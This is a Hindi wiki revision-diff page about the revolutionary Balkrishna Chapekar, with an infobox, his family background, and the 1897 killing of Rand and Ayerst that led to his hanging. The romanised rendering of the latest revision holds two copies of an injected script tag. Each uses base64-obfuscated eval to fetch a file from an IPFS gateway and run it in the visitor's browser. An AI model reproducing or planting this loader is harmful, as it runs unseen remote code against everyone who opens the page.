Difference between revisions of "बालकृष्ण चापेकर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''बालकृष्ण चापेकर''' (जन्म- [[1873]]; मृत्यु- [[9 फरवरी]], [[1899]]) [[भारतीय इतिहास]] में प्रसिद्ध हैं। बालकृष्ण चापेकर [[बाल गंगाधर तिलक]] से अत्यधिक प्रभावित थे। इन्होंने अपने निष्ठुर व्यवहार के कारण प्लेग-विरोधी अभियान कार्यान्वित किया था।
+
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
 +
|चित्र=Balkrishna-chapekar.jpg
 +
|चित्र का नाम=बालकृष्ण चापेकर
 +
|पूरा नाम=बालकृष्ण चापेकर
 +
|अन्य नाम=
 +
|जन्म=[[1873]]
 +
|जन्म भूमि= [[पुणे]], [[महाराष्ट्र]]
 +
|मृत्यु= [[9 फरवरी]], [[1899]]
 +
|मृत्यु स्थान=
 +
|अभिभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=स्वतंत्रता सेनानी एवं समाजसेवी
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|खोज=
 +
|भाषा=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=[[चापेकर बन्धु]], [[दामोदर हरी चापेकर]], [[वासुदेव चापेकर]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|अन्य जानकारी= बालकृष्ण तथा दामोदर चापेकर ने [[जून]], [[1897]] ई. में [[महारानी विक्टोरिया]] के '[[हीरक जयन्ती]]' समारोह के अवसर पर दो ब्रिटिश अधिकारियों रैण्ड और ले. एम्हर्स्ट की हत्या कर दी थी।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''बालकृष्ण चापेकर''' ([[अंग्रेज़ी]]: ''Balkrishna Chapekar'', जन्म: [[1873]]; मृत्यु: [[9 फरवरी]], [[1899]]) [[भारतीय इतिहास]] में प्रसिद्ध स्वतंत्रता सेनानी थे। बालकृष्ण चापेकर [[बाल गंगाधर तिलक]] से अत्यधिक प्रभावित थे। इन्होंने अपने निष्ठुर व्यवहार के कारण प्लेग-विरोधी अभियान कार्यान्वित किया था।
 
=== परिचय ===
 
=== परिचय ===
 
बालकृष्ण चापेकर का जन्म [[1873]] में हुआ था। बालकृष्ण चित्तपवन परिवार से थे तथा इनका परिवार कोणकन से आया था। बालकृष्ण के पिता हरिपन्त एक पादरी थे तथा वे अनेक स्थानों पर जाकर [[कीर्तन]] एवं पौराणिक कथाएँ लोगों को सुनाते थे। दामोदर चापेकर तथा वासुदेव चापेकर इनके भाई थे। जिन्होंने अपने निष्ठुर व्यवहार के कारण प्लेग-विरोधी अभियान कार्यान्वित किया था।  
 
बालकृष्ण चापेकर का जन्म [[1873]] में हुआ था। बालकृष्ण चित्तपवन परिवार से थे तथा इनका परिवार कोणकन से आया था। बालकृष्ण के पिता हरिपन्त एक पादरी थे तथा वे अनेक स्थानों पर जाकर [[कीर्तन]] एवं पौराणिक कथाएँ लोगों को सुनाते थे। दामोदर चापेकर तथा वासुदेव चापेकर इनके भाई थे। जिन्होंने अपने निष्ठुर व्यवहार के कारण प्लेग-विरोधी अभियान कार्यान्वित किया था।  
 
===मृत्यु===
 
===मृत्यु===
बालकृष्ण तथा दामोदर चापेकर ने [[जून]], [[1897]] ई. में [[महारानी विक्टोरिया]] के '[[हीरक जयन्ती]]' समारोह के अवसर पर दो ब्रिटिश अधिकारियों रैण्ड और ले. एम्हर्स्ट की हत्या कर दी थी। इस हत्याकाण्ड में बालकृष्ण को गिरफ़्तार कर [[9 फरवरी]], [[1899]] में फांसी पर लटका दिया गया।  
+
बालकृष्ण तथा दामोदर चापेकर ने [[जून]], [[1897]] ई. में [[महारानी विक्टोरिया]] के '[[हीरक जयन्ती]]' समारोह के अवसर पर दो ब्रिटिश अधिकारियों रैण्ड और ले. एम्हर्स्ट की हत्या कर दी थी। इस हत्याकाण्ड में बालकृष्ण को गिरफ़्तार कर [[9 फरवरी]], [[1899]] में फाँसी पर लटका दिया गया।<ref>{{cite web |url=http://www.kranti1857.org/maharstra%20krantikari.php#chapekar%20balakrishan|title=महाराष्ट्र के क्रांतिकारी|accessmonthday=15 फ़रवरी |accessyear=2017 |last= |first= |authorlink= |format= |publisher=क्रान्ति1857|language= हिंदी}}</ref>
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==बाहरी कड़ियाँ==
 +
*[https://mukundsathe.com/tag/balkrishna-chapekar/  Balkrishna Chapekar ]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{स्वतंत्रता सेनानी}}
 
{{स्वतंत्रता सेनानी}}
[[Category:स्वतन्त्रता सेनानी]][[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]]
+
[[Category:स्वतन्त्रता सेनानी]][[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]][[Category:इतिहास कोश]][[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:28, 6 April 2018

balkrishna chapekar
poora nam balkrishna chapekar
janm 1873
janm bhoomi pune, maharashtr
mrityu 9 pharavari, 1899
karm bhoomi bharat
karm-kshetr svatantrata senani evan samajasevi
nagarikata bharatiy
sanbandhit lekh chapekar bandhu, damodar hari chapekar, vasudev chapekar
any janakari balkrishna tatha damodar chapekar ne joon, 1897 ee. mean maharani viktoriya ke 'hirak jayanti' samaroh ke avasar par do british adhikariyoan raind aur le. emharst ki hatya kar di thi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

balkrishna chapekar (aangrezi: Balkrishna Chapekar, janm: 1873; mrityu: 9 pharavari, 1899) bharatiy itihas mean prasiddh svatantrata senani the. balkrishna chapekar bal gangadhar tilak se atyadhik prabhavit the. inhoanne apane nishthur vyavahar ke karan pleg-virodhi abhiyan karyanvit kiya tha.

parichay

balkrishna chapekar ka janm 1873 mean hua tha. balkrishna chittapavan parivar se the tatha inaka parivar konakan se aya tha. balkrishna ke pita haripant ek padari the tatha ve anek sthanoan par jakar kirtan evan pauranik kathaean logoan ko sunate the. damodar chapekar tatha vasudev chapekar inake bhaee the. jinhoanne apane nishthur vyavahar ke karan pleg-virodhi abhiyan karyanvit kiya tha.

mrityu

balkrishna tatha damodar chapekar ne joon, 1897 ee. mean maharani viktoriya ke 'hirak jayanti' samaroh ke avasar par do british adhikariyoan raind aur le. emharst ki hatya kar di thi. is hatyakand mean balkrishna ko giraftar kar 9 pharavari, 1899 mean phaansi par lataka diya gaya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. maharashtr ke kraantikari (hiandi) kranti1857. abhigaman tithi: 15 faravari, 2017.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani